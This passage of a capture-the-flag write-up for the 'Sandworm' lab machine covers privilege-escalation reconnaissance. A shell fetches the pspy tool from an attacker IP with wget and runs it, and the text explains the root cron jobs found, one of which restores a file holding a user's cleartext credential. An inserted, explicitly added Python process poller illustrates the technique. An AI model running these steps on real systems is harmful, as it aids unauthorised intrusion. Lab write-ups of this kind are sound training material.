PSPY
A root cronjob process was found
silentobserver@sandworm:/dev/shm$ wget -q http://10.10.14.4/pspy64 ; chmod 755 ./pspy64
Delivery complete
silentobserver@sandworm:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
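To illustrate the polling technique the config line above describes (scan every 100 ms, report each new process with its owner), here is an added example in Python that is not pspy's own code and not part of the original writeup: it snapshots /proc, diffs consecutive snapshots, and prints what appeared, much like pspy's process column. The function names and the default interval are my own choices.

```python
import os
import time

PROC = "/proc"


def parse_status_uid(status_text):
    """Extract the real uid from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("Uid:"):
            return int(line.split()[1])
    return None


def parse_cmdline(raw):
    """Turn the NUL-separated /proc/<pid>/cmdline bytes into a printable command line."""
    return " ".join(p.decode(errors="replace") for p in raw.split(b"\0") if p)


def snapshot_processes(proc=PROC):
    """Return {pid: (uid, cmdline)} for every process currently visible in /proc."""
    procs = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            with open(f"{proc}/{entry}/status") as f:
                uid = parse_status_uid(f.read())
            with open(f"{proc}/{entry}/cmdline", "rb") as f:
                cmd = parse_cmdline(f.read())
        except OSError:
            continue  # the process exited between listdir and the read
        procs[int(entry)] = (uid, cmd)
    return procs


def new_processes(old, new):
    """Processes present in `new` but not in `old`, as (pid, uid, cmdline) sorted by pid."""
    return sorted((pid, *new[pid]) for pid in new.keys() - old.keys())


def watch(interval=0.1, rounds=None, proc=PROC):
    """Poll like pspy: print each newly appeared process with its uid. rounds=None runs forever."""
    seen = snapshot_processes(proc)
    done = 0
    while rounds is None or done < rounds:
        time.sleep(interval)
        current = snapshot_processes(proc)
        for pid, uid, cmd in new_processes(seen, current):
            print(f"UID={uid:<5} PID={pid:<7} | {cmd}")
        seen = current
        done += 1


if __name__ == "__main__":
    watch()
```

This visibility is exactly what lets an unprivileged shell observe root's cron jobs; mounting /proc with hidepid=2 hides other users' /proc/<pid> entries and blunts this kind of polling.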
Executing PSPY
1. The first process:
   - changes directory to /opt/tipnet
   - echoes "e"
   - builds and runs the program as the atlas user with the --offline flag

1.2. This is the program itself executing as the atlas user.

2. The second process removes the /opt/crates directory recursively.

3. This one calls a bash script at /root/Clearnup/clean_c.sh.

4. This process could be part of the 3rd process above, /root/Clearnup/clean_c.sh. It basically restores the admin.json file, which contained the CLEARTEXT credential of the silentobserver user.